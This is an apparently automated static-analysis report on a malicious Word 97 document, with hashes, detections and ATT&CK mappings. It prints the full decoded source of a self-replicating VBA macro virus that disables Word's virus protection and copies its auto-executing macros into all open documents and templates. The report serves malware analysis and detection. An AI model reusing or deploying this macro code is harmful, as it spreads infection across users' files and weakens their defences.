Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42a27cfab42eba57…

MALICIOUS

Office (OLE)

40.5 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 0332f84c18c99a040516d48740eef170 SHA-1: 56292dc1dabd23447c4defb51ee59dfa7783d928 SHA-256: 42a27cfab42eba578e074eb9c5cc696f251966821948a234d5ab975c9b0a07c1
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including AutoOpen and AutoClose, which are indicative of malicious intent. The script attempts to copy its macros to other open documents and templates, suggesting a worm-like behavior to spread infection. The presence of ClamAV detections like 'Doc.Trojan.CopyTest-1' and 'Win.Trojan.Alicia-3' further confirms its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.CopyTest-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.CopyTest-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2393 bytes
SHA-256: 9911413c8dcfeea0939e9e396365238c1d88c373bf977cd036193f7d27aabf7c
Detection
ClamAV: Win.Trojan.Alicia-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Infect"
Sub MAIN()
    
    myname = ThisDocument.FullName
    Word.Options.VirusProtection = False
    
    For Each d In Word.Documents
        If (d.FullName <> myname) Then
            Debug.Print myname + " -> " + d.FullName
            Call CopyMacros(myname, d.FullName)
        End If
    Next d
    
    For Each t In Word.Templates
        If (t.FullName <> myname) Then
            Call CopyMacros(myname, t.FullName)
        End If
    Next t
    Rem Application.OrganizerCopy "d:\test2.doc", "d:\test1.doc", "Test", 3
End Sub

Sub CopyMacros(ByVal s As String, ByVal d As String)
    On Error GoTo AlreadyInfected

    Application.OrganizerCopy s, d, "Infect", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoClose", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoExec", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoOpen", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoExit", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "FileClose", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "FileSave", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "FileSaveAs", wdOrganizerObjectProjectItems

AlreadyInfected:
End Sub

Sub SaveDoc()
    If (Application.ActiveDocument.Saved = False) Then
        If (Application.ActiveDocument.Path <> "") Then
            Application.ActiveDocument.Save
        End If
    End If
End Sub

Attribute VB_Name = "AutoClose"
Sub MAIN()
    Infect.MAIN
    Infect.SaveDoc
End Sub


Attribute VB_Name = "AutoExec"
Sub MAIN()
    Infect.MAIN
End Sub


Attribute VB_Name = "AutoOpen"
Sub MAIN()
    Infect.MAIN
End Sub

Attribute VB_Name = "AutoExit"
Sub MAIN()
    Infect.MAIN
End Sub


Attribute VB_Name = "FileClose"
Sub MAIN()
    Infect.MAIN
    Infect.SaveDoc
End Sub


Attribute VB_Name = "FileSave"
Sub MAIN()
    Infect.MAIN
End Sub


Attribute VB_Name = "FileSaveAs"
Sub MAIN()
    Infect.MAIN
    Word.Dialogs(wdDialogFileSaveAs).Show
End Sub